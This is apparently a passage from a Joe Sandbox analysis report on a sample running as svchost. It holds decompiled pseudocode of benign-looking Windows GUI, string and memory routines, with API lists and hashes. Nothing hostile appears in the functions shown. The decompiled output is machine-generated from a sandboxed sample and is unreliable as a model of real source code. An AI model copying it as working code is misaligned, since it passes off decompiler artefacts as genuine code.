					if(_t31 != 2) {
						if(_t31 != 1) {
							goto L18;
						} else {
							if(_a20 == 0) {
								_t44 =  *0x4e19e4; // 0x0
								_a20 = _t44;
							}
							asm("sbb eax, eax");
							_t37 = MultiByteToWideChar(_a20, ( ~_a28 & 0x00000008) + 1, _a8, _a12, 0, 0);
							_v36 = _t37;
							if(_t37 == 0) {
								goto L18;
							} else {
								_v8 = 0;
								E00471390(_t37 + _t37 + 0x00000003 & 0x000000fc, _t53);
								_v28 = _t63;
								_t60 = _t63;
								_v40 = _t60;
								E004733C0(_t60, 0, _t37 + _t37);
								_v8 = _v8 | 0xffffffff;
								if(_t60 == 0) {
									goto L18;
								} else {
									_t43 = MultiByteToWideChar(_a20, 1, _a8, _a12, _t60, _v36);
									if(_t43 == 0) {
										goto L18;
									} else {
										_t32 = GetStringTypeW(_a4, _t60, _t43, _a16);
									}
								}
							}
						}
					} else {
						_t45 = _a24;
						if(_t45 == 0) {
							_t45 =  *0x4e19d4; // 0x0
						}
						_t32 = GetStringTypeA(_t45, _a4, _a8, _a12, _a16);
					}
				} else {
					_push( &_v32);
					_t61 = 1;
					if(GetStringTypeW(_t61, 0x49de2c, _t61, ??) == 0) {
						if(GetStringTypeA(0, _t61, 0x49de28, _t61,  &_v32) == 0) {
							L18:
							_t32 = 0;
						} else {
							_t31 = 2;
							goto L5;
						}
					} else {
						_t31 = _t61;
						L5:
						 *0x4e1a04 = _t31;
						goto L6;
					}
				}
				 *[fs:0x0] = _v20;
				return _t32;
			}





















    0x0047c0fb
    0x0047c0fd
    0x0047c102
    0x0047c10d
    0x0047c10e
    0x0047c115
    0x0047c11b
    0x0047c11e
    0x0047c127
    0x0047c167
    0x0047c16a
    0x0047c193
    0x00000000
    0x0047c199
    0x0047c19c
    0x0047c19e
    0x0047c1a3
    0x0047c1a3
    0x0047c1b3
    0x0047c1bd
    0x0047c1c3
    0x0047c1c8
    0x00000000
    0x0047c1ca
    0x0047c1ca
    0x0047c1d7
    0x0047c1dc
    0x0047c1df
    0x0047c1e1
    0x0047c1e7
    0x0047c1fc
    0x0047c202
    0x00000000
    0x0047c204
    0x0047c213
    0x0047c21b
    0x00000000
    0x0047c21d
    0x0047c225
    0x0047c225
    0x0047c21b
    0x0047c202
    0x0047c1c8
    0x0047c16c
    0x0047c16c
    0x0047c171
    0x0047c173
    0x0047c173
    0x0047c185
    0x0047c185
    0x0047c129
    0x0047c12c
    0x0047c12f
    0x0047c13f
    0x0047c159
    0x0047c22d
    0x0047c22d
    0x0047c15f
    0x0047c161
    0x00000000
    0x0047c161
    0x0047c141
    0x0047c141
    0x0047c162
    0x0047c162
    0x00000000
    0x0047c162
    0x0047c13f
    0x0047c235
    0x0047c240

    APIs
    • GetStringTypeW.KERNEL32(00000001,0049DE2C,00000001,-00000030,?,00000000,-00000030,?,?,004709C1,00000000,00418522,00000000), ref: 0047C137
    • GetStringTypeA.KERNEL32(00000000,00000001,0049DE28,00000001,?,?,?,004709C1,00000000,00418522,00000000), ref: 0047C151
    • GetStringTypeA.KERNEL32(-00000030,00418522,00000000,004709C1,?,?,00000000,-00000030,?,?,004709C1,00000000,00418522,00000000), ref: 0047C185
    • MultiByteToWideChar.KERNEL32(?,00000001,00000000,004709C1,00000000,00000000,?,00000000,-00000030,?,?,004709C1,00000000,00418522,00000000), ref: 0047C1BD
    • MultiByteToWideChar.KERNEL32(?,00000001,00000000,004709C1,?,?,?,?,?,?,?,004709C1,00000000,00418522), ref: 0047C213
    • GetStringTypeW.KERNEL32(00418522,?,00000000,?,?,?,?,?,?,?,?,004709C1,00000000,00418522), ref: 0047C225
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: StringType$ByteCharMultiWide
    • String ID:
    • API String ID: 3852931651-0
    • Opcode ID: 1884a599e59319acff80b73f8ee9721e3c69b16fc9a4bbc606121cd70c779922
    • Instruction ID: fe10e16db4adbd4e3886088c3cea5bf655331c077043bf0db1af16a4bda7053e
    • Opcode Fuzzy Hash: 1884a599e59319acff80b73f8ee9721e3c69b16fc9a4bbc606121cd70c779922
    • Instruction Fuzzy Hash: CA416D72901259AFCF208FA4DD85EEF3FA8FB19750F10893AF91596261C3388910DB99
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00424BE0 Relevance: 9.1, APIs: 6, Instructions: 100COMMON
    Download Yara Rule
    C-Code - Quality: 80%
    			E00424BE0(void* __ecx, void* __ebp, void* __eflags, long _a4) {
				int _v0;
				int _v4;
				intOrPtr _v8;
				struct HDC__* _v12;
				struct HDC__* _v20;
				struct HDC__* _v28;
				char _v32;
				signed int _v36;
				void* _v40;
				struct HDC__* _v64;
				struct HDC__* _v72;
				char _v88;
				void* _t27;
				void* _t32;
				struct HDC__* _t47;
				void* _t70;
				void* _t75;
				void* _t81;
				struct HDC__* _t84;

				_t81 = __ebp;
				_push(0xffffffff);
				_push(E0048EF38);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t84;
				_t47 = _a4;
				_t75 = __ecx;
				_t27 = E00424B50(__ecx, _t47);
				_t70 = _t27;
				if(_t70 != 0) {
					E004892C7( &_v28);
					_v4 = 0;
					if(_t47 != 0) {
						_t47 =  *(_t47 + 4);
					}
					if(E0048937E( &_v32, CreateCompatibleDC(_t47)) != 0) {
						_push(_t81);
						_t32 = SelectObject(_v28, _t70);
						asm("sbb eax, eax");
						BitBlt( *(_v8 + 4), _v4, _v0,  *((intOrPtr*)(_t75 + 0x98)) -  *((intOrPtr*)(_t75 + 0x90)),  *((intOrPtr*)(_t75 + 0x9c)) -  *((intOrPtr*)(_t75 + 0x94)),  ~( &_v40) & _v36, 0, 0, _a4);
						SelectObject(_v72, _t32);
						DeleteObject(_t70);
						_v64 = 0xffffffff;
						E004893FC( &_v88);
						 *[fs:0x0] = _v72;
						return 1;
					} else {
						DeleteObject(_t70);
						_v12 = 0xffffffff;
						E004893FC( &_v36);
						 *[fs:0x0] = _v20;
						return 0;
					}
				} else {
					 *[fs:0x0] = _v12;
					return _t27;
				}
			}






















    0x00424be0
    0x00424be6
    0x00424be8
    0x00424bed
    0x00424bee
    0x00424bf9
    0x00424bff
    0x00424c02
    0x00424c07
    0x00424c0b
    0x00424c25
    0x00424c2c
    0x00424c34
    0x00424c36
    0x00424c36
    0x00424c4c
    0x00424c86
    0x00424c89
    0x00424cb3
    0x00424cd5
    0x00424ce1
    0x00424ce4
    0x00424cee
    0x00424cf6
    0x00424d08
    0x00424d12
    0x00424c4e
    0x00424c4f
    0x00424c59
    0x00424c61
    0x00424c6f
    0x00424c79
    0x00424c79
    0x00424c0d
    0x00424c14
    0x00424c1e
    0x00424c1e

    APIs
      • Part of subcall function 00424B50: CreateDIBitmap.GDI32(?,?,00000004,?,?,00000000), ref: 00424BCB
    • CreateCompatibleDC.GDI32(?), ref: 00424C3A
    • DeleteObject.GDI32(00000000), ref: 00424C4F
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Create$BitmapCompatibleDeleteObject
    • String ID:
    • API String ID: 3709961035-0
    • Opcode ID: f58c7f9419fbfd684d7ed82202486fcf59cdde92d2ada33c4c588edd07d3a7e6
    • Instruction ID: a2b92118ead697f1e460a60a56a68714c4d1e2cbe52dc9b653d32e06bd616b3b
    • Opcode Fuzzy Hash: f58c7f9419fbfd684d7ed82202486fcf59cdde92d2ada33c4c588edd07d3a7e6
    • Instruction Fuzzy Hash: 02318D72204741ABC314DF69D984F6BB7E8FBC8720F044A2EF55983291CB38A805CB65
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0048CA4F Relevance: 9.1, APIs: 6, Instructions: 85memoryCOMMONLIBRARYCODE
    Download Yara Rule
    C-Code - Quality: 40%
    			E0048CA4F(long* __ecx, signed int _a4, intOrPtr _a8) {
				void* _v8;
				void* _t28;
				void* _t34;
				void* _t35;
				void* _t41;
				signed int* _t47;
				void* _t60;
				long* _t63;

				_push(__ecx);
				_t63 = __ecx;
				_t60 = TlsGetValue( *__ecx);
				if(_t60 == 0) {
					_t28 = E0048C815(0x10);
					if(_t28 == 0) {
						_t60 = 0;
					} else {
						 *_t28 = 0x49ccc0;
						_t60 = _t28;
					}
					 *(_t60 + 8) =  *(_t60 + 8) & 0x00000000;
					 *(_t60 + 0xc) =  *(_t60 + 0xc) & 0x00000000;
					_t8 = _t60 + 8; // 0x8
					_t47 = _t8;
					_t9 =  &(_t63[7]); // 0x4e1438
					_v8 = _t60;
					 *0x49224c(_t9);
					_t11 =  &(_t63[5]); // 0x4e1430
					_t50 = _t11;
					E0048C7BC(_t11, _t60);
					_t12 =  &(_t63[7]); // 0x4e1438
					 *0x492250(_t12);
					goto L8;
				} else {
					_t2 = _t60 + 8; // 0x8
					_t47 = _t2;
					if(_a4 >=  *_t47 && _a8 != 0) {
						L8:
						_t34 =  *(_t60 + 0xc);
						if(_t34 != 0) {
							_t15 =  &(_t63[3]); // 0x4
							_t50 =  *_t15 << 2;
							_t35 = LocalReAlloc(_t34,  *_t15 << 2, 2);
						} else {
							_t14 =  &(_t63[3]); // 0x4
							_t35 = LocalAlloc(0,  *_t14 << 2);
						}
						 *(_t60 + 0xc) = _t35;
						if(_t35 == 0) {
							E00481443(_t50);
						}
						_t17 =  &(_t63[3]); // 0x4
						E004733C0( *(_t60 + 0xc) +  *_t47 * 4, 0,  *_t47 * 0x3fffffff +  *_t17 << 2);
						_t21 =  &(_t63[3]); // 0x4
						 *_t47 =  *_t21;
						TlsSetValue( *_t63, _t60);
					}
				}
				_t41 =  *(_t60 + 0xc);
				 *((intOrPtr*)(_t41 + _a4 * 4)) = _a8;
				return _t41;
			}











    0x0048ca52
    0x0048ca55
    0x0048ca60
    0x0048ca64
    0x0048ca82
    0x0048ca89
    0x0048ca95
    0x0048ca8b
    0x0048ca8b
    0x0048ca91
    0x0048ca91
    0x0048ca97
    0x0048ca9b
    0x0048ca9f
    0x0048ca9f
    0x0048caa2
    0x0048caa6
    0x0048caa9
    0x0048cab0
    0x0048cab0
    0x0048cab3
    0x0048cab8
    0x0048cabc
    0x00000000
    0x0048ca66
    0x0048ca69
    0x0048ca69
    0x0048ca6e
    0x0048cac2
    0x0048cac2
    0x0048cac7
    0x0048cada
    0x0048cadf
    0x0048cae4
    0x0048cac9
    0x0048cac9
    0x0048cad2
    0x0048cad2
    0x0048caec
    0x0048caef
    0x0048caf1
    0x0048caf1
    0x0048cb00
    0x0048cb10
    0x0048cb15
    0x0048cb1b
    0x0048cb20
    0x0048cb20
    0x0048ca6e
    0x0048cb26
    0x0048cb31
    0x0048cb36

    APIs
    • TlsGetValue.KERNEL32(004E141C,004E140C,00000000,?,004E141C,?,0048CCB7,004E140C,00000000,?,?,00483860,?,0040AB42,000007DD), ref: 0048CA5A
    • RtlEnterCriticalSection.NTDLL(004E1438), ref: 0048CAA9
    • RtlLeaveCriticalSection.NTDLL(004E1438), ref: 0048CABC
    • LocalAlloc.KERNEL32(00000000,00000004,?,004E141C,?,0048CCB7,004E140C,00000000,?,?,00483860,?,0040AB42,000007DD,?,00000000), ref: 0048CAD2
    • LocalReAlloc.KERNEL32(?,00000004,00000002,?,004E141C,?,0048CCB7,004E140C,00000000,?,?,00483860,?,0040AB42,000007DD), ref: 0048CAE4
    • TlsSetValue.KERNEL32(004E141C,00000000), ref: 0048CB20
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: AllocCriticalLocalSectionValue$EnterLeave
    • String ID:
    • API String ID: 4117633390-0
    • Opcode ID: 64e541c4e251bc67af59eaa027691656516683d0c65e4ac741d7ab8805b854aa
    • Instruction ID: 3a37cb211e279f544c40f33679720a82c672f40dd4499f81fe7e403223efab85
    • Opcode Fuzzy Hash: 64e541c4e251bc67af59eaa027691656516683d0c65e4ac741d7ab8805b854aa
    • Instruction Fuzzy Hash: 4D31BF31100609EFD728EF55C88AF6AB7E8FB44314F00C92AE516C7650DB74E919CB69
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0048AE61 Relevance: 9.1, APIs: 6, Instructions: 67COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0048AE61(struct HWND__* _a4, struct HWND__** _a8) {
				struct HWND__* _t6;
				void* _t12;
				struct HWND__** _t14;
				struct HWND__* _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;

				_t17 = _a4;
				_t16 = _t17;
				if(_t17 != 0) {
					L16:
					if((GetWindowLongA(_t16, 0xfffffff0) & 0x40000000) == 0) {
						L4:
						_t15 = _t16;
						_t6 = _t16;
						if(_t16 == 0) {
							L6:
							if(_t17 == 0 && _t16 != 0) {
								_t16 = GetLastActivePopup(_t16);
							}
							_t14 = _a8;
							if(_t14 != 0) {
								if(_t15 == 0 || IsWindowEnabled(_t15) == 0 || _t15 == _t16) {
									 *_t14 =  *_t14 & 0x00000000;
								} else {
									 *_t14 = _t15;
									EnableWindow(_t15, 0);
								}
							}
							return _t16;
						} else {
							goto L5;
						}
						do {
							L5:
							_t15 = _t6;
							_t6 = GetParent(_t6);
						} while (_t6 != 0);
						goto L6;
					}
					_t16 = GetParent(_t16);
					L15:
					if(_t16 == 0) {
						goto L4;
					}
					goto L16;
				}
				_t12 = E0048AEFD();
				if(_t12 != 0) {
					L14:
					_t16 =  *(_t12 + 0x1c);
					goto L15;
				}
				_t12 = E0046F80D();
				if(_t12 != 0) {
					goto L14;
				}
				_t16 = 0;
				goto L4;
			}









    0x0048ae69
    0x0048ae71
    0x0048ae73
    0x0048aeda
    0x0048aee8
    0x0048ae89
    0x0048ae8b
    0x0048ae8d
    0x0048ae8f
    0x0048ae9a
    0x0048ae9c
    0x0048aea9
    0x0048aea9
    0x0048aeab
    0x0048aeb1
    0x0048aeb5
    0x0048aef1
    0x0048aec6
    0x0048aec9
    0x0048aecb
    0x0048aecb
    0x0048aeb5
    0x0048aefa
    0x00000000
    0x00000000
    0x00000000
    0x0048ae91
    0x0048ae91
    0x0048ae92
    0x0048ae94
    0x0048ae96
    0x00000000
    0x0048ae91
    0x0048aeed
    0x0048aed6
    0x0048aed8
    0x00000000
    0x00000000
    0x00000000
    0x0048aed8
    0x0048ae75
    0x0048ae7c
    0x0048aed3
    0x0048aed3
    0x00000000
    0x0048aed3
    0x0048ae7e
    0x0048ae85
    0x00000000
    0x00000000
    0x0048ae87
    0x00000000

    APIs
    • GetParent.USER32(?), ref: 0048AE94
    • GetLastActivePopup.USER32(?), ref: 0048AEA3
    • IsWindowEnabled.USER32(?), ref: 0048AEB8
    • EnableWindow.USER32(?,00000000), ref: 0048AECB
    • GetWindowLongA.USER32(?,000000F0), ref: 0048AEDD
    • GetParent.USER32(?), ref: 0048AEEB
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
    • String ID:
    • API String ID: 670545878-0
    • Opcode ID: 5a42f71a2cf0af0e629bb1ba9fdb8aa202a4a96ad83b4ed65d008e30e6972519
    • Instruction ID: 30190ed4f9c054cdba02bb56b7e973969262f3ba280db517999e5898c04bcccd
    • Opcode Fuzzy Hash: 5a42f71a2cf0af0e629bb1ba9fdb8aa202a4a96ad83b4ed65d008e30e6972519
    • Instruction Fuzzy Hash: DB11943268132257B6317A694D44B3F72989F64B61F050D67ED01A7310DBD8DC5193EF
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00432350 Relevance: 9.1, APIs: 6, Instructions: 54COMMON
    Download Yara Rule
    C-Code - Quality: 72%
    			E00432350(void* __ecx, char _a4, char _a8) {
				struct tagPOINT _v8;
				intOrPtr _v12;
				signed int _t18;
				void* _t33;

				_t33 = __ecx;
				if(_a4 != __ecx || _a8 != 1) {
					L6:
					return E00484BEB(_t33);
				} else {
					GetCursorPos( &_v8);
					ScreenToClient( *(_t33 + 0x1c),  &_v8);
					_push(0);
					_push( &_a8);
					_push( &_a4);
					_push( &_v8);
					_t18 = E00432400(_t33) | 0xffffffff;
					if(_v12 == _t18) {
						if(_v8.x == _t18) {
							goto L6;
						} else {
							SetCursor(LoadCursorA(0, 0x7f84));
							return 1;
						}
					} else {
						SetCursor(LoadCursorA(0, 0x7f85));
						return 1;
					}
				}
			}







    0x00432358
    0x0043235c
    0x004323f0
    0x004323fb
    0x0043236d
    0x00432372
    0x00432381
    0x0043238b
    0x00432391
    0x00432396
    0x00432397
    0x004323a3
    0x004323a8
    0x004323ce
    0x00000000
    0x004323d0
    0x004323de
    0x004323ed
    0x004323ed
    0x004323aa
    0x004323b8
    0x004323c7
    0x004323c7
    0x004323a8

    APIs
    • GetCursorPos.USER32(?), ref: 00432372
    • ScreenToClient.USER32(00000001,?), ref: 00432381
      • Part of subcall function 00432400: DPtoLP.GDI32(?,?,00000001), ref: 00432517
    • LoadCursorA.USER32(00000000,00007F85), ref: 004323B1
    • SetCursor.USER32(00000000), ref: 004323B8
    • LoadCursorA.USER32(00000000,00007F84), ref: 004323D7
    • SetCursor.USER32(00000000), ref: 004323DE
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Cursor$Load$ClientScreen
    • String ID:
    • API String ID: 789353160-0
    • Opcode ID: f3fde6d54fdecd29795aea7d12916171fb84c40c806c9123e4d854501c23d3fe
    • Instruction ID: 7a50c2b4b558166438255bca1e510b4095ce398bfac60761c2a63129300264df
    • Opcode Fuzzy Hash: f3fde6d54fdecd29795aea7d12916171fb84c40c806c9123e4d854501c23d3fe
    • Instruction Fuzzy Hash: 2B11A931504201BFC610DB64EE89F9F7368ABA4B11F00453FF54686280EAB8D949C7B7
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0048A866 Relevance: 9.0, APIs: 6, Instructions: 48windowCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0048A866(struct HWND__* _a4) {
				struct HWND__* _t3;
				struct HWND__* _t7;
				struct HWND__* _t9;
				struct HWND__* _t11;

				_t3 = GetFocus();
				_t11 = _t3;
				if(_t11 != 0) {
					_t9 = _a4;
					if(_t11 != _t9) {
						if(E0048A70B(_t11, 3) != 0) {
							L5:
							if(_t9 == 0 || (GetWindowLongA(_t9, 0xfffffff0) & 0x40000000) == 0) {
								L8:
								return SendMessageA(_t11, 0x14f, 0, 0);
							}
							_t7 = GetParent(_t9);
							_t3 = GetDesktopWindow();
							if(_t7 != _t3) {
								goto L8;
							}
						} else {
							_t3 = GetParent(_t11);
							_t11 = _t3;
							if(_t11 != _t9) {
								_t3 = E0048A70B(_t11, 2);
								if(_t3 != 0) {
									goto L5;
								}
							}
						}
					}
				}
				return _t3;
			}







    0x0048a869
    0x0048a86f
    0x0048a873
    0x0048a875
    0x0048a87b
    0x0048a88d
    0x0048a8a4
    0x0048a8a6
    0x0048a8c7
    0x00000000
    0x0048a8d1
    0x0048a8b9
    0x0048a8bd
    0x0048a8c5
    0x00000000
    0x00000000
    0x0048a88f
    0x0048a890
    0x0048a892
    0x0048a896
    0x0048a89b
    0x0048a8a2
    0x00000000
    0x00000000
    0x0048a8a2
    0x0048a896
    0x0048a88d
    0x0048a87b
    0x0048a8da

    APIs
    • GetFocus.USER32 ref: 0048A869
      • Part of subcall function 0048A70B: GetWindowLongA.USER32(00000000,000000F0), ref: 0048A71C
    • GetParent.USER32(00000000), ref: 0048A890
      • Part of subcall function 0048A70B: GetClassNameA.USER32(00000000,?,0000000A), ref: 0048A737
      • Part of subcall function 0048A70B: lstrcmpi.KERNEL32(?,combobox), ref: 0048A746
    • GetWindowLongA.USER32(?,000000F0), ref: 0048A8AB
    • GetParent.USER32(?), ref: 0048A8B9
    • GetDesktopWindow.USER32 ref: 0048A8BD
    • SendMessageA.USER32(00000000,0000014F,00000000,00000000), ref: 0048A8D1
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Window$LongParent$ClassDesktopFocusMessageNameSendlstrcmpi
    • String ID:
    • API String ID: 2818563221-0
    • Opcode ID: f4dff09f56319b917e454a2bb60453d9216cc43469ed69b0c4057b6734afef6d
    • Instruction ID: 9ce3e664a7b184b8411bcfbea3de375009d667f1b9d6bf592094088b95b2fa0f
    • Opcode Fuzzy Hash: f4dff09f56319b917e454a2bb60453d9216cc43469ed69b0c4057b6734afef6d
    • Instruction Fuzzy Hash: E3F0813164162136F22236255D88FBF62585F81B60F150937FA25A7280AB98DD13A7BF
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0048A780 Relevance: 9.0, APIs: 6, Instructions: 46COMMON
    Download Yara Rule
    C-Code - Quality: 42%
    			E0048A780(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
				struct tagRECT _v20;
				struct HWND__* _t22;

				ClientToScreen(_a4,  &_a8);
				_push(5);
				_push(_a4);
				while(1) {
					_t22 = GetWindow();
					if(_t22 == 0) {
						break;
					}
					if(GetDlgCtrlID(_t22) == 0xffff || (GetWindowLongA(_t22, 0xfffffff0) & 0x10000000) == 0) {
						L5:
						_push(2);
						_push(_t22);
						continue;
					} else {
						GetWindowRect(_t22,  &_v20);
						_push(_a12);
						if(PtInRect( &_v20, _a8) != 0) {
							return _t22;
						}
						goto L5;
					}
				}
				return 0;
			}





    0x0048a78f
    0x0048a79b
    0x0048a79d
    0x0048a7a0
    0x0048a7a2
    0x0048a7a6
    0x00000000
    0x00000000
    0x0048a7b3
    0x0048a7e4
    0x0048a7e4
    0x0048a7e6
    0x00000000
    0x0048a7c5
    0x0048a7ca
    0x0048a7d0
    0x0048a7e2
    0x00000000
    0x0048a7e9
    0x00000000
    0x0048a7e2
    0x0048a7b3
    0x00000000

    APIs
    • ClientToScreen.USER32(?,?), ref: 0048A78F
    • GetWindow.USER32(?,00000005), ref: 0048A7A0
    • GetDlgCtrlID.USER32(00000000), ref: 0048A7A9
    • GetWindowLongA.USER32(00000000,000000F0), ref: 0048A7B8
    • GetWindowRect.USER32(00000000,?), ref: 0048A7CA
